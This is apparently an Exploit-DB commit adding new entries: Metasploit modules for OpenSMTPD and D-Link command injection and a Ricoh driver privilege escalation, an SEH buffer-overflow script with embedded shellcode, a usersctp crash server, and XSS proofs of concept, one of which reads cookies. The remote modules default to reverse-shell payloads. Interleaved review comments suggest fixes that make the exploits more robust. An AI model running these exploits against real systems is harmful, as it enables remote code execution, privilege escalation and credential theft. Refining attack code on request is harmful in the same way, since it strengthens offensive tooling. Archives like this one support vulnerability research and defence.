DB: 2020-02-11

11 changes to exploits/shellcodes

Dota 2 7.23f - Denial of Service (PoC)
usersctp - Out-of-Bounds Reads in sctp_load_addresses_from_init
iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()
Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow
Ricoh Driver - Privilege Escalation (Metasploit)
D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)
Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting
LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting

Linux/x86 - Bind Shell Generator Shellcode (114 bytes)
This commit is contained in:
Offensive Security 2020-02-11 05:02:02 +00:00
parent 54935a7883
commit 8cbf7883c1
13 changed files with 778 additions and 0 deletions

76
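--- a/exploits/linux/dos/48034.py
+++ b/exploits/linux/dos/48034.py
@@ -0,0 +1,76 @@
+'''
+usersctp is SCTP library used by a variety of software including WebRTC. There is a vulnerability in the sctp_load_addresses_from_init function of usersctp that can lead to a number of out-of-bound reads. The input to sctp_load_addresses_from_init is verified by calling sctp_arethere_unrecognized_parameters, however there is a difference in how these functions handle parameter bounds. The function sctp_arethere_unrecognized_parameters does not process a parameter that is partially outside of the limit of the chunk, meanwhile, sctp_load_addresses_from_init will continue processing until a parameter that is entirely outside of the chunk occurs. This means that the last parameter of a chunk is not always verified, which can lead to parameters with very short plen values being processed by sctp_load_addresses_from_init. This can lead to out-of-bounds reads whenever the plen is subtracted from the header len.
+To reproduce this issue:
+1) run the attached 'server', initack.py
+python init_ack.py
+2) run the sample usersctp client
+./programs/.libs/client 127.0.0.1 7 0 8888 7777
+The client will crash.
+'''
+import sys
+from socket import *
+import zlib
+ECHO_PORT = 7777
+BUFSIZE = 1024
+def getshort(arr):
+return ord(arr[1]) + (ord(arr[0]) << 8);
+def getlen(arr):
+return ord(arr[0]) + (ord(arr[1]) << 8);
+def main():
+server()
+def print_pack(pack):
+o = ""
+for item in pack:
+o = o + hex(ord(item)) + " "
+print "PACKET SENT", o
+def server():
+times = 0
+if len(sys.argv) > 2:
+port = eval(sys.argv[2])
+else:
+port = ECHO_PORT
+s = socket(AF_INET, SOCK_DGRAM)
+s.bind(('', port))
+print 'udp echo server ready'
+while 1:
+data, addr = s.recvfrom(BUFSIZE)
+pack = ""
+for item in data:
+pack = pack + hex(ord(item)) + " "
+print 'server received %r from %r' % (pack, addr)
+vtag = data[16:20]
+type = ord(data[12])
+length = getshort(data[14:])
+port = "\x00\x07" + data[0:2]
+print "type", type, "len", length, "plen", len(data)
+ia = "\x86\x02\x01\x00\x2a\xe6\x97\x19\x00\x2c\x7c\x9f\x18\x33\x03\xc3\x07\x00\x01\x8e\x05\x00\x07\x00\x14\x0b\x36\x14\x01\x30\x2a\xe6\x97\x19\x00\x2c\x7c\x9f\xf9\x33\x05\x80\x03\x00\x01"
+print "vtag", hex(ord(vtag[0])), hex(ord(vtag[1])), hex(ord(vtag[2])), hex(ord(vtag[3]))
+o = port + "\0\0\0\0" + "\0\0\0\0" + vtag + ia[1:]
+crc = zlib.crc32(o) & 0xffffffff
+crcb= chr(crc&0xf) + chr((crc>> 8)&0xf) + chr((crc>> 16)&0xf) + chr((crc>> 24)&0xf)
+o = port + vtag + crcb + ia[1:]
+print_pack(o)
+s.sendto(o, addr)
+main()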
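Review bot: `port = eval(sys.argv[2])` in server() evaluates an arbitrary command-line argument as Python, although the value is only ever used as a UDP port number; `port = int(sys.argv[2])` does the job and fails cleanly on non-numeric input. The module docstring tells the reader to run `initack.py` and then `python init_ack.py`, neither of which matches this file's name, so the reproduction steps should name the script consistently (e.g. `python 48034.py [port]`). `times = 0` is assigned but never read and can be dropped, and the local `type` shadows the builtin; `chunk_type` would be clearer.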

128
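--- a/exploits/linux/remote/48038.rb
+++ b/exploits/linux/remote/48038.rb
@@ -0,0 +1,128 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::Tcp
+include Msf::Exploit::Expect
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'OpenSMTPD MAIL FROM Remote Code Execution',
+'Description' => %q{
+This module exploits a command injection in the MAIL FROM field during
+SMTP interaction with OpenSMTPD to execute code as the root user.
+},
+'Author' => [
+'Qualys', # Discovery and PoC
+'wvu', # Module
+'RageLtMan <rageltman[at]sempervictus>' # Module
+],
+'References' => [
+['CVE', '2020-7247'],
+['URL', 'https://www.openwall.com/lists/oss-security/2020/01/28/3']
+],
+'DisclosureDate' => '2020-01-28',
+'License' => MSF_LICENSE,
+'Platform' => 'unix',
+'Arch' => ARCH_CMD,
+'Privileged' => true,
+'Targets' => [
+['OpenSMTPD >= commit a8e222352f',
+'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars
+]
+],
+'DefaultTarget' => 0,
+'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
+))
+register_options([
+Opt::RPORT(25),
+OptString.new('RCPT_TO', [true, 'Valid mail recipient', 'root'])
+])
+register_advanced_options([
+OptBool.new('ForceExploit', [false, 'Override check result', false]),
+OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
+])
+end
+def check
+connect
+res = sock.get_once
+return CheckCode::Unknown unless res
+return CheckCode::Detected if res =~ /^220.*OpenSMTPD/
+CheckCode::Safe
+rescue EOFError, Rex::ConnectionError => e
+vprint_error(e.message)
+CheckCode::Unknown
+ensure
+disconnect
+end
+def exploit
+unless datastore['ForceExploit']
+unless check == CheckCode::Detected
+fail_with(Failure::Unknown, 'Set ForceExploit to override')
+end
+end
+# We don't care who we are, so randomize it
+me = rand_text_alphanumeric(8..42)
+# Send mail to this valid recipient
+to = datastore['RCPT_TO']
+# Comment "slide" courtesy of Qualys - brilliant!
+iter = rand_text_alphanumeric(15).chars.join(' ')
+from = ";for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;"
+# This is just insurance, since the code was already written
+if from.length > 64
+fail_with(Failure::BadConfig, 'MAIL FROM field is greater than 64 chars')
+elsif (badchars = (from.chars & target['MyBadChars'])).any?
+fail_with(Failure::BadConfig, "MAIL FROM field has badchars: #{badchars}")
+end
+# Create the mail body with comment slide and payload
+body = "\r\n" + "#\r\n" * 15 + payload.encoded
+sploit = {
+nil => /220.*OpenSMTPD/,
+"HELO #{me}" => /250.*pleased to meet you/,
+"MAIL FROM:<#{from}>" => /250.*Ok/,
+"RCPT TO:<#{to}>" => /250.*Recipient ok/,
+'DATA' => /354 Enter mail.*itself/,
+body => nil,
+'.' => /250.*Message accepted for delivery/,
+'QUIT' => /221.*Bye/
+}
+print_status('Connecting to OpenSMTPD')
+connect
+print_status('Saying hello and sending exploit')
+sploit.each do |line, pattern|
+send_expect(
+line,
+pattern,
+sock: sock,
+timeout: datastore['ExpectTimeout'],
+newline: "\r\n"
+)
+end
+rescue Rex::ConnectionError => e
+fail_with(Failure::Unreachable, e.message)
+rescue Timeout::Error => e
+fail_with(Failure::TimeoutExpired, e.message)
+ensure
+disconnect
+end
+end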
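Review bot: `exploit` rescues only `Rex::ConnectionError` and `Timeout::Error`, whereas `check` also handles `EOFError`; if the server closes the connection partway through the `sploit.each` dialogue, the `EOFError` escapes as an unhandled exception instead of a `fail_with`, so `rescue EOFError, Rex::ConnectionError => e` would keep the two methods' error reporting consistent. The `nil` key in the `sploit` hash is not self-explanatory; a comment such as `# nil line: send nothing, only wait for the banner` above it would help (presumably that is how send_expect treats a nil line — confirm against Msf::Exploit::Expect). `DisclosureDate` is ISO-formatted here but `Mon DD YYYY` in the other two modules of this commit; one format across the three would be tidier.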


@ -0,0 +1,76 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
'Description' => %q{
D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
},
'Author' =>
[
's1kr10s',
'secenv'
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-20215'],
['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']
],
'DisclosureDate' => 'Dec 24 2019',
'Privileged' => true,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'wget',
'RPORT' => '1900'
},
'Targets' =>
[
[ 'Auto', { } ],
],
'CmdStagerFlavor' => %w{ echo wget },
'DefaultTarget' => 0
))
register_options(
[
Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
])
end
def exploit
execute_cmdstager(linemax: 1500)
end
def execute_command(cmd, opts)
type = datastore['VECTOR']
if type == "URN"
print_status("Target Payload URN")
val = "urn:device:1;`#{cmd}`"
else
print_status("Target Payload UUID")
val = "uuid:`#{cmd}`"
end
connect_udp
header = "M-SEARCH * HTTP/1.1\r\n"
header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n"
header << "ST:#{val}\r\n"
header << "Man:\"ssdp:discover\"\r\n"
header << "MX:2\r\n\r\n"
udp_sock.put(header)
disconnect_udp
end
end
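Review bot: The `Description` block merely repeats the module name and says nothing about the flaw; it should at least state what the module's own code and references establish, e.g. `Unauthenticated command injection in the ssdpcgi handler of affected D-Link devices (CVE-2019-20215): the ST header value of an SSDP M-SEARCH request reaches a shell, via either the URN or the UUID form selected by VECTOR.` `execute_command(cmd, opts)` never reads `opts`; Ruby convention is `def execute_command(cmd, _opts)` to mark it as intentionally unused. The `else` branch is only ever reached for `UUID` because `VECTOR` is an `OptEnum` restricted to `URN`/`UUID`, which deserves a one-line comment so a later reader does not widen it by accident.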


@ -0,0 +1,11 @@
While investigating possible shared memory issues in AGXCommandQueue::processSegmentKernelCommand(), I noticed that the size checks used to parse the IOAccelKernelCommand in IOAccelCommandQueue2::processSegmentKernelCommand() are incorrect. The IOAccelKernelCommand contains an 8-byte header consisting of a command type and size, followed by structured data specific to the type of command. When verifying that the size of the IOAccelKernelCommand has enough data for the specific command type, it appears that the check excludes the size of the 8-byte header, meaning that processSegmentKernelCommand() will parse up to 8 bytes of out-of-bounds data.
Normally I wouldn't consider this very security-relevant. However, command type 2 corresponds to kIOAccelKernelCommandCollectTimeStamp, which actually *writes* into the OOB memory rather than just parsing data from it. (The IOAccelKernelCommand is being parsed from shared memory, so the write is visible to userspace.) This makes it possible to overwrite the first 1-8 bytes of the subsequent page of memory with timestamp data.
The attached POC should trigger the issue on iOS 13. Tested on iPod9,1 17B111. I haven't tested on macOS, but it looks like the issue is present there as well.
I'll also tack on to this issue that on the whole AGXCommandQueue seems to do a poor job of treating shared memory as volatile, and I suspect that there are further issues here that are worth looking into. For example, when IOAccelKernelCommand's type is 0x10000, AGXCommandQueue::processSegmentKernelCommand() does not use the fourth parameter (which points to the end of the IOAccelKernelCommand as parsed by IOAccelCommandQueue2::processSegmentKernelCommands()) except when passing it to IOAccelCommandQueue2::processSegmentKernelCommand(), instead double-fetching the command size from shared memory to verify that all the command data is in-bounds. Thus, I believe it's possible to make AGXCommandQueue::processSegmentKernelCommand() parse out-of-bounds data, although I have not found a way to turn this into an interesting exploitation primitive. I don't think the shared memory issues are isolated to this function either. For example, there used to be much more readily exploitable double-fetches in AGXAllocationList2::initWithSharedResourceList(), although these were fixed sometime between 16A5288q and 16G77.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48035.zip


@ -0,0 +1,35 @@
# Exploit Title: Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting
# Exploit Author: Prasenjit Kanti Paul
# Vendor Homepage: https://www.forcepoint.com/
# Software Link: https://www.forcepoint.com/product/cloud-security/web-security
# Version: Forcepoint Web Security 8.5
# Tested on: Windows 7,10 and Linux Mint
# CVE : CVE-2019-6146
# ForcePoint KBA: https://support.forcepoint.com/KBArticle?id=000017702
# Video PoC: https://youtu.be/NfXGaNVK6eE
# Description: User must visit any site which is restricted as per
# forcepoint policy. So that forcepoint web security will show a generic
# page. While parsing "Domain Name" within generic page forcepoint is not
# validating Host header, which caused XSS.
Lets assume, while accessing anysite.com, forcepoint web security prevents
us to go to that website with its custom exception/blocking page. Now
follow the steps below:
*Steps*:
1. Intercept the traffic while accessing https://anysite.com
2. Modify the Host header from anysite.com to ">
<script>alert("evilsite")</script>
*Timeline:*
- Oct. 21, 2019 - Issue Reported to PSIRT team of ForcePoint
- Oct. 23, 2019 - ForcePoint team confirms the issue
- Oct. 24, 2019 - CVE-2019-6146 has been assigned
- Jan. 23, 2020 - ForcePoint KBA has been published with proper fixes
*Regards,*
*Prasenjit Kanti Paul*


@ -4,6 +4,7 @@
# Vendor Homepage: https://sourceforge.net/projects/school-erp-ultimate/files/
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/files/
# Version ERP-Ultimate
# CVE: CVE-2020-8504,CVE-2020-8505
# Tested on Windows 10/Kali Rolling
# The School ERP Ultimate web application is vulnerable to Cross Site Request Forgery
# that leads to admin account creation and arbitrary user deletion.


@ -0,0 +1,26 @@
# Exploit Title: LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting
# Date: 2020-01-14
# Vendor Homepage: https://www.learndash.com
# Vendor Changelog: https://learndash.releasenotes.io/release/uCskc-version-312
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/reflected-xss-vulnerability-found-in-learndash-lms-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 3.0.0 - 3.1.1
# CVE : CVE-2020-7108
1. Description
LearnDash is one of the most popular and easiest to use WordPress LMS plugins in the market. It allows users to easily create courses and sell them online and boasts a large customer base. The plugin allows users to search for courses they have subscribed to using the [ld_profile] search field, which was found to be vulnerable to reflected cross site scripting. All WordPress websites using LearnDash version 3.0.0 through 3.1.1 are affected.
2. Proof of Concept
Once the user is logged in to the WordPress website where the vulnerable LearnDash plugin is installed, the XSS payload can be inserted into the Search Your Courses box. The payload gets executed because the user input is not properly validated. As a result, passing the XSS payload as a query string in the URL will also execute the payload.
[wordpress website][learndash my-account page]?ld-profile-search=%3Cscript%3Ealert(document.cookie)%3C/script%3E
An attacker can modify the above URL and use an advanced payload that could help him/her in performing malicious actions.
3. Timeline
Vulnerability reported to the LearnDash team January 14, 2020
LearnDash version 3.1.2 containing the fix released January 14, 2020


@ -0,0 +1,53 @@
# Exploit Title: Dota 2 7.23f - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2020-02-05
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com) (bi7s)
# Vendor Homepage: https://www.valvesoftware.com/en/
# Software Link: N/A
# Version: 7.23f
# Tested on: Windows 10 (x64)
# CVE : CVE-2020-7949
Valve Dota 2 (schemasystem.dll) before 7.23f allows remote attackers to
achieve code execution or denial of service by creating a gaming server and
inviting a victim to this server, because a crafted map is mishandled
during a GetValue call.
Attacker need invite a victim to play on attacker game server using
specially crafted map or create custom game, then when initialize the game
of the victim, the specially crafted map will be automatically downloaded
and processed by the victim, which will lead to the possibility to exploit
vulnerability. Also attacker can create custom map and upload it to Steam
<https://steamcommunity.com/sharedfiles/filedetails/?id=328258382>.
Steps for reproduce:
1. Copy attached file zuff.vpk (
https://github.com/bi7s/CVE/blob/master/CVE-2020-7949/zuff.zip) to map
directory (C:\Program Files (x86)\Steam\steamapps\common\dota 2
beta\game\dota\maps)
2. Launch Dota2
3. Launch "zuff" map from Dota2 game console. Command for game console =
map zuff
4. Dota2 is crash (Access Violation)
Debug information:
(2098.1634): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for C:\Program Files (x86)\Steam\steamapps\common\dota 2
beta\game\bin\win64\schemasystem.dll -
(2098.1634): Access violation - code c0000005 (!!! second chance !!!)
rax=00000000ffffffff rbx=0000027ba23dd9b6 rcx=0000027ba23dd9b6
rdx=0000000042424242 rsi=0000027b5ffb9774 rdi=0000000000000000
rip=00007ffa73af90ce rsp=000000e82bcfe900 rbp=0000000000000000
r8=00000000412ee51c r9=000000e82bcfea88 r10=0000027b5ffb9774
r11=00000000412ee51c r12=0000027b5ffbe582 r13=000000e82bcfe9f0
r14=0000027b5ffb5328 r15=0000000000000010
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200
schemasystem!BinaryProperties_GetValue+0x10ae:
00007ffa`73af90ce 40383b cmp byte ptr [rbx],dil
ds:0000027b`a23dd9b6=??

51
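--- a/exploits/windows/local/48028.py
+++ b/exploits/windows/local/48028.py
@@ -0,0 +1,51 @@
+#Exploit Title: Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow
+#Exploit Author : ZwX
+#Exploit Date: 2020-02-09
+#Vendor Homepage : http://www.wedding-slideshow-studio.com/
+#Tested on OS: Windows 10 v1803
+#Social: twitter.com/ZwX2a
+## Steps to Reproduce: ##
+#1. Run the python exploit script, it will create a new file with the name "poc.txt".
+#2. Just copy the text inside "poc.txt".
+#3. Start the program. In the new window click "Help" > "Register ...
+#4. Now paste the content of "poc.txt" into the field: "Registration Key" > Click "Ok"
+#5. The calculator runs successfully
+#!/usr/bin/python
+from struct import pack
+buffer = "\x41" * 1608
+nseh = "\xeb\x06\xff\xff"
+seh = pack("<I",0x10023b8a)
+#0x10023b8a : pop edi # pop esi # ret 0x04 |{PAGE_EXECUTE_READ} [DVDPhotoData.dll]
+#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\Wedding Slideshow Studio\DVDPhotoData.dll)
+shellcode = ""
+shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
+shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
+shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
+shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
+shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
+shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
+shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
+shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
+shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
+shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
+shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
+shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
+shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
+shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
+shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
+shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
+shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
+payload = buffer + nseh + seh + shellcode
+try:
+f=open("poc.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(payload)
+f.write(payload)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"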
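Review bot: The bare `except:` around the file write swallows every exception, including KeyboardInterrupt and SystemExit, and discards the reason the file could not be written; `except IOError as e:` followed by `print "File cannot be created: %s" % e` reports the real cause. The handle is also left open if `f.write` raises, since `f.close()` is only reached on the success path; `with open("poc.txt", "w") as f:` closes it on every path and makes the explicit `close()` unnecessary. The `#!/usr/bin/python` line sits after the header comments, so it is not an effective shebang — it belongs on line 1 or should be dropped.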

164
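--- a/exploits/windows/local/48036.rb
+++ b/exploits/windows/local/48036.rb
@@ -0,0 +1,164 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core/exploit/exe'
+class MetasploitModule < Msf::Exploit::Local
+Rank = NormalRanking
+include Msf::Post::File
+include Msf::Exploit::EXE
+include Msf::Post::Windows::Priv
+include Msf::Exploit::FileDropper
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Ricoh Driver Privilege Escalation',
+'Description' => %q(
+Various Ricoh printer drivers allow escalation of
+privileges on Windows systems.
+For vulnerable drivers, a low-privileged user can
+read/write files within the `RICOH_DRV` directory
+and its subdirectories.
+`PrintIsolationHost.exe`, a Windows process running
+as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
+during the installation of a printer. A user can
+elevate to SYSTEM by writing a malicious DLL to
+the vulnerable driver directory and adding a new
+printer with a vulnerable driver.
+This module leverages the `prnmngr.vbs` script
+to add and delete printers. Multiple runs of this
+module may be required given successful exploitation
+is time-sensitive.
+),
+'License' => MSF_LICENSE,
+'Author' => [
+'Alexander Pudwill', # discovery & PoC
+'Pentagrid AG', # PoC
+'Shelby Pace' # msf module
+],
+'References' =>
+[
+[ 'CVE', '2019-19363'],
+[ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
+],
+'Arch' => [ ARCH_X86, ARCH_X64 ],
+'Platform' => 'win',
+'Payload' =>
+{
+},
+'SessionTypes' => [ 'meterpreter' ],
+'Targets' =>
+[[
+'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }
+]],
+'Notes' =>
+{
+'SideEffects' => [ ARTIFACTS_ON_DISK ],
+'Reliability' => [ UNRELIABLE_SESSION ],
+'Stability' => [ SERVICE_RESOURCE_LOSS ]
+},
+'DisclosureDate' => "Jan 22 2020",
+'DefaultTarget' => 0
+))
+self.needs_cleanup = true
+register_advanced_options([
+OptBool.new('ForceExploit', [ false, 'Override check result', false ])
+])
+end
+def check
+dir_name = "C:\\ProgramData\\RICOH_DRV"
+return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)
+driver_names = dir(dir_name)
+return CheckCode::Detected("Detected Ricoh driver directory, but no installed drivers") unless driver_names.length
+vulnerable = false
+driver_names.each do |driver_name|
+full_path = "#{dir_name}\\#{driver_name}\\_common\\dlz"
+next unless directory?(full_path)
+@driver_path = full_path
+res = cmd_exec("icacls \"#{@driver_path}\"")
+next unless res.include?('Everyone:')
+next unless res.match(/\(F\)/)
+vulnerable = true
+break
+end
+return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable
+vprint_status("Vulnerable driver directory: #{@driver_path}")
+CheckCode::Appears('Ricoh driver directory has full permissions')
+end
+def add_printer(driver_name)
+fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)
+dll_data = generate_payload_dll
+dll_path = "#{@driver_path}\\headerfooter.dll"
+temp_path = expand_path('%TEMP%\\headerfooter.dll')
+vprint_status("Writing dll to #{temp_path}")
+bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat")
+cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\""
+bat_file = <<~HEREDOC
+:repeat
+#{cp_cmd} && goto :repeat
+HEREDOC
+write_file(bat_file_path, bat_file)
+write_file(temp_path, dll_data)
+register_files_for_cleanup(bat_file_path, temp_path)
+script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
+bat_cmd = "cmd.exe /c \"#{bat_file_path}\""
+print_status("Adding printer #{@printer_name}...")
+client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })
+vprint_status("Executing script...")
+cmd_exec(bat_cmd)
+rescue Rex::Post::Meterpreter::RequestError => e
+e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+end
+def exploit
+fail_with(Failure::None, 'Already running as SYSTEM') if is_system?
+fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'
+if sysinfo['Architecture'] != payload.arch.first
+fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')
+end
+@driver_path = ''
+unless check == CheckCode::Appears || datastore['ForceExploit']
+fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override')
+end
+@printer_name = Rex::Text.rand_text_alpha(5..9)
+@script_path = "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs"
+drvr_name = @driver_path.split('\\')
+drvr_name_idx = drvr_name.index('RICOH_DRV') + 1
+drvr_name = drvr_name[drvr_name_idx]
+add_printer(drvr_name)
+end
+def cleanup
+print_status("Deleting printer #{@printer_name}")
+Rex.sleep(3)
+delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\""
+client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })
+end
+end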
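Review bot: `return CheckCode::Detected(...) unless driver_names.length` in `check` can never return, because `0` is truthy in Ruby, so the "no installed drivers" branch is dead; the intended guard is `unless driver_names.empty?` (this presumes `dir` yields an empty array rather than nil for an empty directory — confirm, since `nil.empty?` would raise). In `exploit`, when `ForceExploit` is set and `check` did not reach a vulnerable directory, `@driver_path` is still `''`, so `drvr_name.index('RICOH_DRV') + 1` raises NoMethodError on nil instead of a clean failure; `fail_with(Failure::NotFound, 'No driver directory found; cannot continue') if @driver_path.empty?` before the split reports it properly. `cleanup` runs even when `exploit` bailed out before a printer was added, so it should start with `return unless @printer_name` rather than invoking the delete script with an empty name. `e_log` in `add_printer`'s rescue does not look like the framework's logging helper (the usual one is `elog`); confirm it resolves, otherwise the rescue clause itself raises.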


@ -6674,6 +6674,9 @@ id,file,description,date,author,type,platform,port
48013,exploits/windows/dos/48013.py,"TapinRadio 2.12.3 - 'username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
48014,exploits/windows/dos/48014.py,"RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
48015,exploits/windows/dos/48015.py,"RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
48031,exploits/windows/dos/48031.txt,"Dota 2 7.23f - Denial of Service (PoC)",2020-02-10,"Bogdan Kurinnoy",dos,windows,
48034,exploits/linux/dos/48034.py,"usersctp - Out-of-Bounds Reads in sctp_load_addresses_from_init",2020-02-10,"Google Security Research",dos,linux,
48035,exploits/multiple/dos/48035.txt,"iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()",2020-02-10,"Google Security Research",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10938,6 +10941,8 @@ id,file,description,date,author,type,platform,port
48000,exploits/linux/local/48000.sh,"xglance-bin 11.00 - Privilege Escalation",2020-02-05,redtimmysec,local,linux,
48009,exploits/windows/local/48009.txt,"ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path",2020-02-06,ZwX,local,windows,
48021,exploits/windows/local/48021.rb,"Windscribe - WindscribeService Named Pipe Privilege Escalation (Metasploit)",2020-02-07,Metasploit,local,windows,
48028,exploits/windows/local/48028.py,"Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow",2020-02-10,ZwX,local,windows,
48036,exploits/windows/local/48036.rb,"Ricoh Driver - Privilege Escalation (Metasploit)",2020-02-10,Metasploit,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17970,6 +17975,8 @@ id,file,description,date,author,type,platform,port
47956,exploits/linux/remote/47956.py,"Pachev FTP Server 1.0 - Path Traversal",2020-01-23,1F98D,remote,linux,21
47984,exploits/linux/remote/47984.py,"OpenSMTPD 6.6.2 - Remote Code Execution",2020-01-30,1F98D,remote,linux,
48004,exploits/hardware/remote/48004.c,"HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account",2020-02-05,Snawoot,remote,hardware,
48037,exploits/linux_mips/remote/48037.rb,"D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)",2020-02-10,Metasploit,remote,linux_mips,1900
48038,exploits/linux/remote/48038.rb,"OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)",2020-02-10,Metasploit,remote,linux,25
